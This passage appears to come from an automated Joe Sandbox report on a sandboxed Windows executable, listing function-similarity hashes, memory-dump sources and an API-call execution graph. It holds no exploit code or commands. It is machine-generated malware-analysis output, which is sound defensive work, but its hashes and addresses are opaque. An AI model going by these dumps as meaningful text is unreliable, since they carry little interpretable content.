                                                                                                                                                                    • Part of subcall function 00007FF690029C58: GetLastError.KERNEL32(?,?,?,00007FF690032032,?,?,?,00007FF69003206F,?,?,00000000,00007FF690032535,?,?,?,00007FF690032467), ref: 00007FF690029C78
                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF69001BEC5), ref: 00007FF69002837C
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe
                                                                                                                                                                  • API String ID: 3580290477-991927476
                                                                                                                                                                  • Opcode ID: ddc46de6380418fe35fca5e4aa859368a8c2113199f78edf785cf6db79d8d493
                                                                                                                                                                  • Instruction ID: 323837247eeec7fd44fbcaff1b2c024b14c6b0abaa7082e72304a3d6f93d6ce2
                                                                                                                                                                  • Opcode Fuzzy Hash: ddc46de6380418fe35fca5e4aa859368a8c2113199f78edf785cf6db79d8d493
                                                                                                                                                                  • Instruction Fuzzy Hash: 9F417F3AA0DB56A6EB34DF39A4810FD2794EF45B94B554075EA4E87B8DDF3CE4828300
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CurrentDirectory_invalid_parameter_noinfo
                                                                                                                                                                  • String ID: .$:
                                                                                                                                                                  • API String ID: 2020911589-4202072812
                                                                                                                                                                  • Opcode ID: 2ab34ab9cd3b86b5895dfaae9249a533cb2656d78b0c7701b1ac49f11c4a311a
                                                                                                                                                                  • Instruction ID: 5a2d6bfc6d16ccbdcb5e4487e37e3528000c87e49f01a57fc38edfa98d1e5d95
                                                                                                                                                                  • Opcode Fuzzy Hash: 2ab34ab9cd3b86b5895dfaae9249a533cb2656d78b0c7701b1ac49f11c4a311a
                                                                                                                                                                  • Instruction Fuzzy Hash: 17414B22F08752A8FB21DBB998512BD26B4EF14798F540079DE4DA7B8DEF38D4878310
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorFileLastWrite
                                                                                                                                                                  • String ID: U
                                                                                                                                                                  • API String ID: 442123175-4171548499
                                                                                                                                                                  • Opcode ID: 0b7df1583adeec31525a7cba2b12c3ee68d62bc9877546cbea7757f0bce6ed29
                                                                                                                                                                  • Instruction ID: 18226b86f7da60d0ba9c0e6db2c843782155f68460b394313a35138751256fd4
                                                                                                                                                                  • Opcode Fuzzy Hash: 0b7df1583adeec31525a7cba2b12c3ee68d62bc9877546cbea7757f0bce6ed29
                                                                                                                                                                  • Instruction Fuzzy Hash: 1541B122A18A8595DB60CF39E8447A97761FB98794F904131EE4DC7B88EF7CD442CB40
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CurrentDirectory
                                                                                                                                                                  • String ID: :
                                                                                                                                                                  • API String ID: 1611563598-336475711
                                                                                                                                                                  • Opcode ID: 42aabba90d01c53827fde20447a69e74228e2fd19b34bc9bc36161037011c97c
                                                                                                                                                                  • Instruction ID: c604af56524368840ac1af1f69b0d6af01d69526383a0a9e493e24773caff9a6
                                                                                                                                                                  • Opcode Fuzzy Hash: 42aabba90d01c53827fde20447a69e74228e2fd19b34bc9bc36161037011c97c
                                                                                                                                                                  • Instruction Fuzzy Hash: 9721B422B086C1D1EB74DB29D04427E77A2FB88B44F554076DA8D83789DF7CE986C741
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                  • String ID: csm
                                                                                                                                                                  • API String ID: 2573137834-1018135373
                                                                                                                                                                  • Opcode ID: 353d784395b77eefcba7ec404c7e4e47dbaba59ece92a9373595b893a828088a
                                                                                                                                                                  • Instruction ID: 65a421ec1a41d30ea9004b64c226a5e4f7d4b14b023dd00de55671022b1f262a
                                                                                                                                                                  • Opcode Fuzzy Hash: 353d784395b77eefcba7ec404c7e4e47dbaba59ece92a9373595b893a828088a
                                                                                                                                                                  • Instruction Fuzzy Hash: 8A115B36618B8492EB628B25F44026AB7E1FB8CB98F184270EF8D47769DF3CD5518B00
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DriveType_invalid_parameter_noinfo
                                                                                                                                                                  • String ID: :
                                                                                                                                                                  • API String ID: 2595371189-336475711
                                                                                                                                                                  • Opcode ID: 229dc5225c97c31120184e1c5c073253f760aebc87e6502baf4f3d3b6f3e4c47
                                                                                                                                                                  • Instruction ID: 80721f3ce00255171da745d508e03c87169964b126ac9a0681d06fc091adc004
                                                                                                                                                                  • Opcode Fuzzy Hash: 229dc5225c97c31120184e1c5c073253f760aebc87e6502baf4f3d3b6f3e4c47
                                                                                                                                                                  • Instruction Fuzzy Hash: E101A261A1C243A6FB30AF78946127E23A0EF58788F800075D64DC6799DF7CE506CA15

                                                                                                                                                                  Execution Graph

                                                                                                                                                                  Execution Coverage:2.5%
                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                  Signature Coverage:0%
                                                                                                                                                                  Total number of Nodes:828
                                                                                                                                                                  Total number of Limit Nodes:31
                                                                                                                                                                  execution_graph 55502 7ff690028c79 55514 7ff6900296e8 55502->55514 55504 7ff690028c7e 55505 7ff690028cef 55504->55505 55506 7ff690028ca5 GetModuleHandleW 55504->55506 55507 7ff690028b7c 11 API calls 55505->55507 55506->55505 55512 7ff690028cb2 55506->55512 55508 7ff690028d2b 55507->55508 55509 7ff690028d32 55508->55509 55510 7ff690028d48 11 API calls 55508->55510 55511 7ff690028d44 55510->55511 55512->55505 55513 7ff690028da0 GetModuleHandleExW GetProcAddress FreeLibrary 55512->55513 55513->55505 55519 7ff69002a460 45 API calls 3 library calls 55514->55519 55516 7ff6900296f1 55520 7ff690029814 45 API calls 2 library calls 55516->55520 55519->55516 55521 7ff690024938 55522 7ff69002496f 55521->55522 55523 7ff690024952 55521->55523 55522->55523 55524 7ff690024982 CreateFileW 55522->55524 55572 7ff6900243d4 11 API calls _get_daylight 55523->55572 55527 7ff6900249b6 55524->55527 55528 7ff6900249ec 55524->55528 55526 7ff690024957 55573 7ff6900243f4 11 API calls _get_daylight 55526->55573 55546 7ff690024a8c GetFileType 55527->55546 55575 7ff690024f14 46 API calls 3 library calls 55528->55575 55532 7ff69002495f 55574 7ff690029bf0 37 API calls _invalid_parameter_noinfo 55532->55574 55534 7ff6900249f1 55538 7ff690024a20 55534->55538 55539 7ff6900249f5 55534->55539 55536 7ff6900249cb CloseHandle 55542 7ff69002496a 55536->55542 55537 7ff6900249e1 CloseHandle 55537->55542 55577 7ff690024cd4 55538->55577 55576 7ff690024368 11 API calls 2 library calls 55539->55576 55545 7ff6900249ff 55545->55542 55547 7ff690024b97 55546->55547 55548 7ff690024ada 55546->55548 55550 7ff690024b9f 55547->55550 55551 7ff690024bc1 55547->55551 55549 7ff690024b06 GetFileInformationByHandle 55548->55549 55595 7ff690024e10 21 API calls _fread_nolock 55548->55595 55552 7ff690024b2f 55549->55552 55553 7ff690024bb2 GetLastError 55549->55553 55550->55553 55554 7ff690024ba3 55550->55554 55555 7ff690024be4 PeekNamedPipe 55551->55555 55571 7ff690024b82 55551->55571 55557 7ff690024cd4 51 API calls 55552->55557 55598 7ff690024368 11 API calls 2 library calls 55553->55598 55597 7ff6900243f4 11 API calls _get_daylight 55554->55597 55555->55571 55561 7ff690024b3a 55557->55561 55560 7ff690024af4 55560->55549 55560->55571 55588 7ff690024c34 55561->55588 55566 7ff690024c34 10 API calls 55567 7ff690024b59 55566->55567 55568 7ff690024c34 10 API calls 55567->55568 55569 7ff690024b6a 55568->55569 55569->55571 55596 7ff6900243f4 11 API calls _get_daylight 55569->55596 55599 7ff69001b870 55571->55599 55572->55526 55573->55532 55574->55542 55575->55534 55576->55545 55579 7ff690024cfc 55577->55579 55578 7ff690024a2d 55587 7ff690024e10 21 API calls _fread_nolock 55578->55587 55579->55578 55610 7ff69002ea34 51 API calls 2 library calls 55579->55610 55581 7ff690024d90 55581->55578 55611 7ff69002ea34 51 API calls 2 library calls 55581->55611 55583 7ff690024da3 55583->55578 55612 7ff69002ea34 51 API calls 2 library calls 55583->55612 55585 7ff690024db6 55585->55578 55613 7ff69002ea34 51 API calls 2 library calls 55585->55613 55587->55545 55589 7ff690024c5d FileTimeToSystemTime 55588->55589 55590 7ff690024c50 55588->55590 55591 7ff690024c58 55589->55591 55592 7ff690024c71 SystemTimeToTzSpecificLocalTime 55589->55592 55590->55589 55590->55591 55593 7ff69001b870 _log10_special 8 API calls 55591->55593 55592->55591 55594 7ff690024b49 55593->55594 55594->55566 55595->55560 55596->55571 55597->55571 55598->55571 55600 7ff69001b879 55599->55600 55601 7ff69001b884 55600->55601 55602 7ff69001bc00 IsProcessorFeaturePresent 55600->55602 55601->55536 55601->55537 55603 7ff69001bc18 55602->55603 55608 7ff69001bdf8 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 55603->55608 55605 7ff69001bc2b 55609 7ff69001bbc0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 55605->55609 55608->55605 55610->55581 55611->55583 55612->55585 55613->55578 55614 7ff69002ec9c 55615 7ff69002ee8e 55614->55615 55617 7ff69002ecde _isindst 55614->55617 55661 7ff6900243f4 11 API calls _get_daylight 55615->55661 55617->55615 55620 7ff69002ed5e _isindst 55617->55620 55618 7ff69001b870 _log10_special 8 API calls 55619 7ff69002eea9 55618->55619 55635 7ff6900354a4 55620->55635 55625 7ff69002eeba 55662 7ff690029c10 IsProcessorFeaturePresent 55625->55662 55632 7ff69002edbb 55634 7ff69002ee7e 55632->55634 55660 7ff6900354e8 37 API calls _isindst 55632->55660 55634->55618 55636 7ff69002ed7c 55635->55636 55637 7ff6900354b3 55635->55637 55642 7ff6900348a8 55636->55642 55666 7ff69002f5e8 EnterCriticalSection 55637->55666 55639 7ff6900354bb 55640 7ff6900354cc 55639->55640 55641 7ff690035314 55 API calls 55639->55641 55641->55640 55643 7ff69002ed91 55642->55643 55644 7ff6900348b1 55642->55644 55643->55625 55648 7ff6900348d8 55643->55648 55667 7ff6900243f4 11 API calls _get_daylight 55644->55667 55646 7ff6900348b6 55668 7ff690029bf0 37 API calls _invalid_parameter_noinfo 55646->55668 55649 7ff69002eda2 55648->55649 55650 7ff6900348e1 55648->55650 55649->55625 55654 7ff690034908 55649->55654 55669 7ff6900243f4 11 API calls _get_daylight 55650->55669 55652 7ff6900348e6 55670 7ff690029bf0 37 API calls _invalid_parameter_noinfo 55652->55670 55655 7ff690034911 55654->55655 55659 7ff69002edb3 55654->55659 55671 7ff6900243f4 11 API calls _get_daylight 55655->55671 55657 7ff690034916 55672 7ff690029bf0 37 API calls _invalid_parameter_noinfo 55657->55672 55659->55625 55659->55632 55660->55634 55661->55634 55663 7ff690029c23 55662->55663 55673 7ff690029924 14 API calls 3 library calls 55663->55673 55665 7ff690029c3e GetCurrentProcess TerminateProcess 55667->55646 55668->55643 55669->55652 55670->55649 55671->55657 55672->55659 55673->55665 55674 7ff69001bf5c 55695 7ff69001c12c 55674->55695 55677 7ff69001c0a8 55814 7ff69001c44c 7 API calls 2 library calls 55677->55814 55678 7ff69001bf78 __scrt_acquire_startup_lock 55680 7ff69001c0b2 55678->55680 55687 7ff69001bf96 __scrt_release_startup_lock 55678->55687 55815 7ff69001c44c 7 API calls 2 library calls 55680->55815 55682 7ff69001bfbb 55683 7ff69001c0bd __FrameHandler3::FrameUnwindToEmptyState 55684 7ff69001c041 55701 7ff69001c594 55684->55701 55686 7ff69001c046 55704 7ff690011000 55686->55704 55687->55682 55687->55684 55811 7ff690028e44 45 API calls 55687->55811 55692 7ff69001c069 55692->55683 55813 7ff69001c2b0 7 API calls 55692->55813 55694 7ff69001c080 55694->55682 55696 7ff69001c134 55695->55696 55697 7ff69001c140 __scrt_dllmain_crt_thread_attach 55696->55697 55698 7ff69001c14d 55697->55698 55700 7ff69001bf70 55697->55700 55698->55700 55816 7ff69001cba8 7 API calls 2 library calls 55698->55816 55700->55677 55700->55678 55817 7ff6900397e0 55701->55817 55703 7ff69001c5ab GetStartupInfoW 55703->55686 55705 7ff690011009 55704->55705 55819 7ff690024794 55705->55819 55707 7ff69001352b 55826 7ff6900133e0 55707->55826 55710 7ff690013538 55712 7ff69001b870 _log10_special 8 API calls 55710->55712 55714 7ff69001372a 55712->55714 55812 7ff69001c5d8 GetModuleHandleW 55714->55812 55715 7ff690013736 55925 7ff690013f70 55715->55925 55716 7ff69001356c 55919 7ff690011bf0 55716->55919 55720 7ff690013785 55948 7ff6900125f0 53 API calls _log10_special 55720->55948 55724 7ff690013778 55726 7ff69001377d 55724->55726 55727 7ff69001379f 55724->55727 55725 7ff69001365f __std_exception_destroy 55729 7ff690013844 55725->55729 55732 7ff690017e10 14 API calls 55725->55732 55944 7ff69001f36c 55726->55944 55728 7ff690011bf0 49 API calls 55727->55728 55731 7ff6900137be 55728->55731 55952 7ff690013e90 49 API calls 55729->55952 55740 7ff6900118f0 115 API calls 55731->55740 55735 7ff6900136ae 55732->55735 55734 7ff690013588 55888 7ff690017e10 55734->55888 55923 7ff690017f80 40 API calls __std_exception_destroy 55735->55923 55736 7ff690013852 55738 7ff690013871 55736->55738 55739 7ff690013865 55736->55739 55743 7ff690011bf0 49 API calls 55738->55743 55953 7ff690013fe0 55739->55953 55744 7ff6900137df 55740->55744 55741 7ff6900136bd 55745 7ff69001380f 55741->55745 55748 7ff6900136cf 55741->55748 55746 7ff690013805 __std_exception_destroy 55743->55746 55744->55734 55747 7ff6900137ef 55744->55747 55950 7ff690018400 58 API calls _log10_special 55745->55950 55901 7ff6900186b0 55746->55901 55949 7ff6900125f0 53 API calls _log10_special 55747->55949 55752 7ff690011bf0 49 API calls 55748->55752 55756 7ff6900136f1 55752->55756 55753 7ff690013814 55951 7ff690017c40 84 API calls 2 library calls 55753->55951 55755 7ff69001389e SetDllDirectoryW 55759 7ff6900138c3 55755->55759 55756->55746 55760 7ff6900136fc 55756->55760 55762 7ff690013a50 55759->55762 55956 7ff690016560 53 API calls 55759->55956 55924 7ff6900125f0 53 API calls _log10_special 55760->55924 55761 7ff690013834 55761->55729 55761->55746 55765 7ff690013a5a PostMessageW GetMessageW 55762->55765 55766 7ff690013a7d 55762->55766 55765->55766 55906 7ff690013080 55766->55906 55767 7ff6900138d5 55957 7ff690016b00 118 API calls 2 library calls 55767->55957 55769 7ff6900138ea 55771 7ff690013947 55769->55771 55773 7ff690013901 55769->55773 55958 7ff6900165a0 121 API calls _log10_special 55769->55958 55771->55762 55779 7ff69001395c 55771->55779 55786 7ff690013905 55773->55786 55959 7ff690016970 91 API calls 55773->55959 55777 7ff690013916 55777->55786 55960 7ff690016cd0 54 API calls 55777->55960 55963 7ff6900130e0 122 API calls 2 library calls 55779->55963 55782 7ff690013964 55782->55710 55785 7ff69001396c 55782->55785 55784 7ff690013aa3 55964 7ff6900183e0 LocalFree 55785->55964 55786->55771 55961 7ff690012870 53 API calls _log10_special 55786->55961 55789 7ff69001393f 55962 7ff690016780 FreeLibrary 55789->55962 55811->55684 55812->55692 55813->55694 55814->55680 55815->55683 55816->55700 55818 7ff6900397d0 55817->55818 55818->55703 55818->55818 55822 7ff69002e790 55819->55822 55820 7ff69002e7e3 55966 7ff690029b24 37 API calls 2 library calls 55820->55966 55822->55820 55823 7ff69002e836 55822->55823 55967 7ff69002e668 71 API calls _fread_nolock 55823->55967 55825 7ff69002e80c 55825->55707 55968 7ff69001bb70 55826->55968 55828 7ff6900133ec GetModuleFileNameW 55829 7ff690013438 55828->55829 55830 7ff69001341b 55828->55830 55970 7ff6900185a0 FindFirstFileExW 55829->55970 55975 7ff6900129e0 51 API calls _log10_special 55830->55975 55834 7ff69001344b 55976 7ff690018620 CreateFileW GetFinalPathNameByHandleW CloseHandle 55834->55976 55835 7ff6900134a5 55978 7ff690018760 WideCharToMultiByte WideCharToMultiByte __std_exception_destroy 55835->55978 55837 7ff69001b870 _log10_special 8 API calls 55840 7ff6900134dd 55837->55840 55839 7ff690013458 55842 7ff69001345c 55839->55842 55844 7ff690013474 __vcrt_InitializeCriticalSectionEx 55839->55844 55840->55710 55848 7ff6900118f0 55840->55848 55841 7ff6900134b3 55847 7ff69001342e 55841->55847 55979 7ff6900126c0 49 API calls _log10_special 55841->55979 55977 7ff6900126c0 49 API calls _log10_special 55842->55977 55844->55835 55846 7ff69001346d 55846->55847 55847->55837 55849 7ff690013f70 108 API calls 55848->55849 55850 7ff690011925 55849->55850 55851 7ff690011bb6 55850->55851 55853 7ff6900176a0 83 API calls 55850->55853 55852 7ff69001b870 _log10_special 8 API calls 55851->55852 55854 7ff690011bd1 55852->55854 55855 7ff69001196b 55853->55855 55854->55715 55854->55716 55887 7ff69001199c 55855->55887 55980 7ff69001f9f4 55855->55980 55857 7ff69001f36c 74 API calls 55857->55851 55858 7ff690011985 55859 7ff690011989 55858->55859 55860 7ff6900119a1 55858->55860 55987 7ff690012760 53 API calls 2 library calls 55859->55987 55984 7ff69001f6bc 55860->55984 55864 7ff6900119d7 55867 7ff690011a06 55864->55867 55868 7ff6900119ee 55864->55868 55865 7ff6900119bf 55988 7ff690012760 53 API calls 2 library calls 55865->55988 55869 7ff690011bf0 49 API calls 55867->55869 55989 7ff690012760 53 API calls 2 library calls 55868->55989 55871 7ff690011a1d 55869->55871 55872 7ff690011bf0 49 API calls 55871->55872 55873 7ff690011a68 55872->55873 55874 7ff69001f9f4 73 API calls 55873->55874 55875 7ff690011a8c 55874->55875 55876 7ff690011ab9 55875->55876 55877 7ff690011aa1 55875->55877 55879 7ff69001f6bc _fread_nolock 53 API calls 55876->55879 55990 7ff690012760 53 API calls 2 library calls 55877->55990 55880 7ff690011ace 55879->55880 55881 7ff690011aec 55880->55881 55882 7ff690011ad4 55880->55882 55992 7ff69001f430 37 API calls 2 library calls 55881->55992 55991 7ff690012760 53 API calls 2 library calls 55882->55991 55885 7ff690011b06 55885->55887 55993 7ff6900125f0 53 API calls _log10_special 55885->55993 55887->55857 55889 7ff690017e1a 55888->55889 55890 7ff6900186b0 2 API calls 55889->55890 55891 7ff690017e39 GetEnvironmentVariableW 55890->55891 55892 7ff690017e56 ExpandEnvironmentStringsW 55891->55892 55893 7ff690017ea2 55891->55893 55892->55893 55895 7ff690017e78 55892->55895 55894 7ff69001b870 _log10_special 8 API calls 55893->55894 55897 7ff690017eb4 55894->55897 56023 7ff690018760 WideCharToMultiByte WideCharToMultiByte __std_exception_destroy 55895->56023 55897->55725 55898 7ff690017e8a 55899 7ff69001b870 _log10_special 8 API calls 55898->55899 55900 7ff690017e9a 55899->55900 55900->55725 55902 7ff6900186f6 55901->55902 55903 7ff6900186d2 MultiByteToWideChar 55901->55903 55904 7ff690018713 MultiByteToWideChar 55902->55904 55905 7ff69001870c __std_exception_destroy 55902->55905 55903->55902 55903->55905 55904->55905 55905->55755 56024 7ff690015af0 55906->56024 55910 7ff6900130a1 55914 7ff6900130b9 55910->55914 56094 7ff690015800 55910->56094 55912 7ff6900130ad 55912->55914 56103 7ff690015990 53 API calls 55912->56103 55915 7ff6900133a0 55914->55915 55916 7ff6900133ae 55915->55916 55917 7ff6900133bf 55916->55917 56236 7ff690018180 FreeLibrary 55916->56236 55965 7ff690016780 FreeLibrary 55917->55965 55920 7ff690011c15 55919->55920 56237 7ff690023ca4 55920->56237 55923->55741 55924->55710 55926 7ff690013f7c 55925->55926 55927 7ff6900186b0 2 API calls 55926->55927 55928 7ff690013fa4 55927->55928 55929 7ff6900186b0 2 API calls 55928->55929 55930 7ff690013fb7 55929->55930 56264 7ff6900252a4 55930->56264 55933 7ff69001b870 _log10_special 8 API calls 55934 7ff690013746 55933->55934 55934->55720 55935 7ff6900176a0 55934->55935 55936 7ff6900176c4 55935->55936 55937 7ff69001f9f4 73 API calls 55936->55937 55942 7ff69001779b __std_exception_destroy 55936->55942 55938 7ff6900176e0 55937->55938 55938->55942 56430 7ff690026bd8 55938->56430 55940 7ff69001f9f4 73 API calls 55943 7ff6900176f5 55940->55943 55941 7ff69001f6bc _fread_nolock 53 API calls 55941->55943 55942->55724 55943->55940 55943->55941 55943->55942 55945 7ff69001f39c 55944->55945 56446 7ff69001f148 55945->56446 55947 7ff69001f3b5 55947->55720 55948->55710 55949->55710 55950->55753 55951->55761 55952->55736 55954 7ff690011bf0 49 API calls 55953->55954 55955 7ff690014010 55954->55955 55955->55746 55956->55767 55957->55769 55958->55773 55959->55777 55960->55786 55961->55789 55962->55771 55963->55782 55965->55784 55966->55825 55967->55825 55969 7ff69001bb9a 55968->55969 55969->55828 55969->55969 55971 7ff6900185df FindClose 55970->55971 55972 7ff6900185f2 55970->55972 55971->55972 55973 7ff69001b870 _log10_special 8 API calls 55972->55973 55974 7ff690013442 55973->55974 55974->55834 55974->55835 55975->55847 55976->55839 55977->55846 55978->55841 55979->55847 55981 7ff69001fa24 55980->55981 55994 7ff69001f784 55981->55994 55983 7ff69001fa3d 55983->55858 56007 7ff69001f6dc 55984->56007 55987->55887 55988->55887 55989->55887 55990->55887 55991->55887 55992->55885 55993->55887 55995 7ff69001f7ee 55994->55995 55996 7ff69001f7ae 55994->55996 55995->55996 55998 7ff69001f7fa 55995->55998 56006 7ff690029b24 37 API calls 2 library calls 55996->56006 56005 7ff69002477c EnterCriticalSection 55998->56005 56000 7ff69001f7ff 56001 7ff69001f908 71 API calls 56000->56001 56002 7ff69001f811 56001->56002 56003 7ff690024788 _fread_nolock LeaveCriticalSection 56002->56003 56004 7ff69001f7d5 56003->56004 56004->55983 56006->56004 56008 7ff69001f706 56007->56008 56019 7ff6900119b9 56007->56019 56009 7ff69001f752 56008->56009 56010 7ff69001f715 __scrt_get_show_window_mode 56008->56010 56008->56019 56020 7ff69002477c EnterCriticalSection 56009->56020 56021 7ff6900243f4 11 API calls _get_daylight 56010->56021 56013 7ff69001f75a 56015 7ff69001f45c _fread_nolock 51 API calls 56013->56015 56014 7ff69001f72a 56022 7ff690029bf0 37 API calls _invalid_parameter_noinfo 56014->56022 56017 7ff69001f771 56015->56017 56018 7ff690024788 _fread_nolock LeaveCriticalSection 56017->56018 56018->56019 56019->55864 56019->55865 56021->56014 56022->56019 56023->55898 56025 7ff690015b05 56024->56025 56026 7ff690011bf0 49 API calls 56025->56026 56027 7ff690015b41 56026->56027 56028 7ff690015b4a 56027->56028 56029 7ff690015b6d 56027->56029 56114 7ff6900125f0 53 API calls _log10_special 56028->56114 56031 7ff690013fe0 49 API calls 56029->56031 56032 7ff690015b85 56031->56032 56033 7ff690015ba3 56032->56033 56115 7ff6900125f0 53 API calls _log10_special 56032->56115 56104 7ff690013f10 56033->56104 56034 7ff69001b870 _log10_special 8 API calls 56038 7ff69001308e 56034->56038 56038->55914 56055 7ff690015c80 56038->56055 56039 7ff690015bbb 56041 7ff690013fe0 49 API calls 56039->56041 56042 7ff690015bd4 56041->56042 56043 7ff690015bf9 56042->56043 56044 7ff690015bd9 56042->56044 56046 7ff6900181a0 3 API calls 56043->56046 56116 7ff6900125f0 53 API calls _log10_special 56044->56116 56048 7ff690015c06 56046->56048 56047 7ff690015b63 56047->56034 56049 7ff690015c49 56048->56049 56050 7ff690015c12 56048->56050 56118 7ff6900150b0 95 API calls 56049->56118 56052 7ff6900186b0 2 API calls 56050->56052 56053 7ff690015c2a 56052->56053 56117 7ff6900129e0 51 API calls _log10_special 56053->56117 56119 7ff690014c80 56055->56119 56057 7ff690015cba 56058 7ff690015cc2 56057->56058 56059 7ff690015cd3 56057->56059 56151 7ff6900125f0 53 API calls _log10_special 56058->56151 56126 7ff690014450 56059->56126 56063 7ff690015cdf 